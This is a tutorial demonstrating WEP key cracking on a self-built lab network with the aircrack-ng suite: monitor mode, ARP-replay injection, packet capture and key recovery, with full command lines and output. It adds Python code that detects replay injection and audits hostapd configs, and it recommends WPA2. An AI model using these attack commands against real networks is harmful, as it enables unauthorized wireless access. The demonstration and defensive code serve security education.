Wireless WEP (in)security



Overview


There is no question that wireless networks are notoriously insecure: it is difficult to protect something that you can’t see, that goes through walls and that everyone close enough can eavesdrop on. Some corporations are still brave enough (or stupid) to allow wireless access to their corporate network, and more often than not they choose the deprecated wireless encryption protocol WEP to avoid compatibility issues. In this article we will demonstrate why allowing wireless access to the corporate network is not a good idea, especially if an old encryption algorithm like WEP is used.


Scenario


To illustrate the scenario we will use an old Linksys wireless PCMCIA network card and break into a wireless network called SoulReaver, which we have set up on a Linksys wireless router specially for this purpose. The laptop on which the potential malicious activities will be performed comes preinstalled with BackTrack 4 Pre, and we will use an ARP injection technique to speed up the demonstration.

Once the operating system has booted, insert the card in the PCMCIA slot and you should see the following line in dmesg:

b43-phy0: Broadcom 4306 WLAN found

This means that the card has been successfully detected. Next we need to put the card in monitoring mode, so we can have a look around. This is achieved with the following command:

# airmon-ng start wlan0

After that a new network interface called mon0 will appear, and we will use it to sniff the air around us:

# airodump-ng mon0

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                             

 00:1A:70:FD:3A:76  -41        5       11    0   6  54e  WEP  WEP         SoulReaver                                                                        

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                  

 (not associated)   00:1D:E0:82:80:31  -74    0 - 1      3        4
 00:1A:70:FD:3A:76  00:21:5D:13:FE:56  -45   54e-54e    45       12

So there we see a wireless network called “SoulReaver” which is protected with WEP. At this point we just fire up a packet sniffer and wait for enough packets to be collected in order to crack the WEP key, but as we want to speed up the process we will use an ARP injection technique to collect more packets faster.

#  aireplay-ng -3 -e SoulReaver -a 00:1A:70:FD:3A:76 -x 200 mon0
No source MAC (-h) specified. Using the device MAC (00:12:17:07:E0:15)
16:06:22  Waiting for beacon frame (ESSID: SoulReaver) on channel 6
Found BSSID "00:1A:70:FD:3A:76" to given ESSID "SoulReaver".
Saving ARP requests in replay_arp-0709-160622.cap
You should also start airodump-ng to capture replies.
Read 7803 packets (got 1 ARP requests and 1173 ACKs), sent 1222 packets...(199 pps)

The command above does the following: it selects the third attack (ARP request replay), specifies that we will attack the wireless network called “SoulReaver” whose access point has the MAC address 00:1A:70:FD:3A:76, and sets the packet injection rate to 200 packets per second. As we can see from the command output, aireplay-ng falls back to the card’s own MAC address as the source (no -h was given), locates the wireless network on channel 6 and waits for a valid ARP packet that can be used for injection. After such a packet is captured, the tool starts sending packets at a rate of 199 packets per second, at which point we can start dumping the packets into a file:

# airodump-ng -c 6 -w soul mon0

The command above instructs airodump-ng to listen on channel 6 on interface mon0 and to write the captured packets to a file called soul.cap (airodump-ng numbers its output files, hence the soul*.cap glob in the next command). After we have captured enough packets, we can try cracking the key with the following command:

# aircrack-ng -a 1 -n 64 soul*.cap

We specify that we want to perform WEP cracking (-a 1) and to try a 64-bit key first (-n 64). If you have captured enough packets, after a short delay the following screen will appear:

                                                                       Aircrack-ng 1.0 rc3 r1552

                                                       [00:00:04] Tested 730859 keys (got 13883 IVs)

   KB    depth   byte(vote)
    0   22/ 32   F3(16384) 40(16128) 53(16128) 7D(16128) 93(16128) 97(16128) A2(16128) A9(16128) AE(16128) CB(16128) 17(15872) 1B(15872)
    1    1/ 14   84(18944) AC(18432) FD(18432) 6E(17920) 5D(17664) B2(17664) 02(17664) 59(17408) 62(17408) 7E(17408) C3(17408) 07(17408)
    2    0/ 12   0D(19968) 5D(19968) 25(18944) 7F(18688) A7(18688) 14(18688) 53(18176) F3(17920) F6(17920) 0A(17152) 9C(16896) 4D(16896)
    3    4/ 10   86(18688) 62(18176) 97(18176) 38(17920) 4F(17664) 6D(17664) 1C(17408) 5E(17408) 70(17408) 92(17408) 02(17152) 3A(16896)
    4    1/ 14   52(19968) F9(19456) F0(18944) 9C(18688) B4(18176) FE(17920) 03(17664) 43(17664) 32(17408) 28(16896) 33(16896) 35(16896) 

                         KEY FOUND! [ CB:74:0D:89:52 ]
	Decrypted correctly: 100%
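A wireless IDS can recognise this injection from the traffic alone: aireplay-ng replays one captured encrypted ARP request unchanged, so the same source MAC, WEP IV and ciphertext repeat hundreds of times per second, and the IV reuse itself is a WEP-only symptom. The following detection logic is an added example, not code from the article or from the aircrack-ng project; the frame records are constructed inline, and the field names and the 50-frames-per-second threshold are assumptions.

```python
"""Spot WEP ARP-replay injection in a stream of 802.11 data-frame records.

Added example, not from the original article or the aircrack-ng project.
Frames are dicts with assumed fields: ts (seconds), src, bssid, iv, body.
"""
from collections import Counter, defaultdict

# aireplay-ng -3 re-sends one captured encrypted ARP request unchanged, so the
# replayed frames share source MAC, WEP IV and ciphertext. Threshold is assumed.
REPLAY_THRESHOLD = 50  # identical frames within one second


def find_replay_bursts(frames, threshold=REPLAY_THRESHOLD):
    """Return {(second, src, iv, body): count} for buckets at or over threshold."""
    buckets = Counter()
    for f in frames:
        buckets[(int(f["ts"]), f["src"], f["iv"], f["body"])] += 1
    return {k: n for k, n in buckets.items() if n >= threshold}


def iv_reuse_by_station(frames):
    """Map src MAC -> number of distinct WEP IVs that station used more than once."""
    seen = defaultdict(Counter)
    for f in frames:
        seen[f["src"]][f["iv"]] += 1
    return {mac: sum(1 for n in ivs.values() if n > 1) for mac, ivs in seen.items()}


def constructed_capture():
    """Constructed sample: 4 s of normal traffic plus 199 replays inside second 2."""
    ap = "00:1A:70:FD:3A:76"        # BSSID from the airodump-ng listing above
    victim = "00:21:5D:13:FE:56"    # associated station from the listing
    injector = "00:12:17:07:E0:15"  # card MAC printed by aireplay-ng above
    frames = [{"ts": 0.1 * i, "src": victim, "bssid": ap,
               "iv": "%06x" % (0x100 + i), "body": "data%02d" % i}
              for i in range(40)]  # fresh IV and payload every frame
    frames += [{"ts": 2.0 + i / 200, "src": injector, "bssid": ap,
                "iv": "abc123", "body": "arp-ciphertext"}
               for i in range(199)]  # one frame replayed at ~199 pps
    return sorted(frames, key=lambda f: f["ts"])


if __name__ == "__main__":
    capture = constructed_capture()
    for (sec, src, iv, _), n in find_replay_bursts(capture).items():
        print(f"t={sec}s station {src} replayed IV {iv} {n} times: ARP injection?")
    print("IV reuse per station:", iv_reuse_by_station(capture))
```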


Mitigation


The recommended solution to WEP security problems is to switch to WPA2, or, with older equipment, to the less resource-intensive WPA. Either is much more secure than WEP. To add support for WPA or WPA2, some old Wi-Fi access points might need to be replaced or have their firmware upgraded. WPA was designed as an interim, software-implementable replacement for WEP that could forestall immediate deployment of new hardware. However, TKIP (the basis of WPA) has reached the end of its designed lifetime and has been deprecated in the next full release of the 802.11 standard.
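As an added illustration (not from the article), here is the same access point expressed as two constructed hostapd configurations, the WEP setup the demo broke and a WPA2/CCMP replacement, together with a small audit function that flags WEP keys and the deprecated TKIP cipher discussed above; the option names are real hostapd keys, the passphrase is a placeholder.

```python
"""Audit a hostapd-style AP config for WEP and deprecated TKIP (added example,
not from the original article). Both configs are constructed; the option names
wep_key0, wpa, wpa_pairwise and rsn_pairwise are real hostapd keys."""

WEAK_CONF = """\
interface=wlan0
ssid=SoulReaver
channel=6
wep_default_key=0
wep_key0=CB740D8952
"""  # the 40-bit key recovered above, written as a hostapd hex key

STRONG_CONF = """\
interface=wlan0
ssid=SoulReaver
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=PLACEHOLDER-replace-with-long-random-passphrase
"""


def parse_conf(text):
    """Parse key=value lines, skipping blanks and # comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf


def audit(text):
    """Return findings (an empty list means WPA2 with CCMP only)."""
    c = parse_conf(text)
    findings = []
    if "wep_default_key" in c or any(k.startswith("wep_key") for k in c):
        findings.append("WEP key configured: replace with wpa=2 and rsn_pairwise=CCMP")
    wpa = int(c.get("wpa", "0"))  # bit 1 = WPA (TKIP era), bit 2 = WPA2/RSN
    if wpa == 0 and not findings:
        findings.append("no WPA/WPA2 configured: open network")
    if wpa & 1:
        findings.append("wpa bit 1 set: WPA1 enabled, TKIP is deprecated")
    ciphers = set((c.get("wpa_pairwise", "") + " " + c.get("rsn_pairwise", "")).split())
    if "TKIP" in ciphers:
        findings.append("TKIP pairwise cipher allowed: restrict to CCMP")
    return findings
```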

